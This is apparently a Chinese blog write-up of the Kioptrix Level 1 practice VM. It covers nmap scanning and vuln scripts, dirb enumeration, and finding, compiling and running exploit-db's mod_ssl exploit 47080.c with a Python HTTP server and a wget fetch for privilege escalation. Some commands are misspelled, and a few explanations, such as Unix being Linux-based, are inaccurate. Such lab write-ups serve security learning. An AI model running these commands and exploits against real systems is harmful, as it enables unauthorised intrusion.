打靶日记 Kioptix Level 1

声明

学习视频来自B站up主泷羽sec有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!

致力于网络安全内容分享和创作
微信公众号 泷羽Sec-临观

下载链接 https://pan.quark.cn/s/4fcd84571a50

一、探测靶机IP(进行信息收集)

ifconfig

ifconfig 查看自己网段,kali和靶机的网段一样

在这里插入图片描述

nmpa -p- 192.168.235.0/24 

扫描全网段,发现多出来的就是ip就是靶机的
在这里插入图片描述

找到ip进入网页进行信息收集,对于可以点击的链接多进行尝试
在这里插入图片描述
在这里插入图片描述

二、查看版本号(指纹探测)

nmap 192.168.253.130 -p 22,80,111,139,443,1024 -sV -sC -O --version-all

在这里插入图片描述
而在这时如果执行上述命令发现没有版本号出来,请仔细检查IP是否输入正确
Too many fingerprints match this host to give specific OS details
这大概率是IP输错了
这里所有的版本都可以去试一下
在靶机里对于多次出现重复的信息一般都是有漏洞的,他不会无缘无故的让你多次看到这些重复的信息(一定要细心)

三、探测基本漏洞进行尝试

nmap 192.168.253.130 -p 22,80,111,139,443,1024 --script=vuln

在这里插入图片描述

  • 在 443/tcp 端口上,检测到ssl -ccs -injection存在漏洞,并且有详细的漏洞描述,指出与 OpenSSL 相关的 CVE - 2014 - 0224 漏洞。
  • 还检测到了ssl -poodle漏洞,与 SSL 协议 3.0 相关的 CVE - 2014 - 3566 漏洞。

四、进行目录枚举

dirb http://192.168.253.130/

在这里插入图片描述
然后到网页中去进行寻找有用信息
在这里插入图片描述
在这里插入图片描述
对于这些文件进行信息收集,多点多看,但最终发现没有什么有用信息,但是在子目录中发现了mod_ssl提示
以及Apache1.3.20频繁出现

五、利用工具searchsploit 查找相关漏洞与exp

searchsploit mod_ssl

在这里插入图片描述
这里首先将linux和dos进行排除
但是有一些exp对应的版本虽然是linux的但是他同样对unix同样有用,因为不管是unix、kali、ubuntu都是基于linux开发的,内核都是一样的,本质上都是linux操作系统
再去[https://www.exploit-db.com]寻找exp
在这里插入图片描述
将exp先下载到本地,再拖入kali里面,如果直接在kali里下载的话,会出现文件损坏
其次这是.c文件,不要忘了进行编译

gcc -o 470 47080.c

在这里插入图片描述
发现编译错误,换一种方式

gcc -o 470 47080.c -lcrypto

lcrypto下载

sudo apt-get install libssl-dev

在这里插入图片描述
会出现一些警告,但问题不大
再通过命令执行了./470.grep "1.3.20"命令,先是运行当前目录下的470文件:(其功能未知),再通过grep工具筛选出包含 “1.3.20” 的输出行,展示的结果是不同操作系统环境下使用apache-1.3.20版本的相关配置情况,各系统以编号加对应描述形式呈现

./470 | grep "1.3.20"

在这里插入图片描述
说明白一点就是让他呈现这些版本的名字、名称、以及一些exp的编号
在这里插入图片描述
这时可以直接尝试0x6a、0x6b,排除其他,根据上方nmap信息收集到的直接排除,只要把0x6a和0x6b测试一下就ok了

六、执行exp提权

sudo python -m http.server 80

开80端口监听,不开这个端口监听可能就会监测不到是否提权的信息

 ./470 0x6b 192.168.253.130 -c 40

下载提权脚本,不用再进行编译,因为当你把这个脚本文件传进去了之后,退出的时候他已经变相的执行了完整的c脚本,再exit退出,然后再次进入

weget http://ip/文件

在这里插入图片描述

sudo ./470 0x6b 192.168.253.130 -c 40

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

临观_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值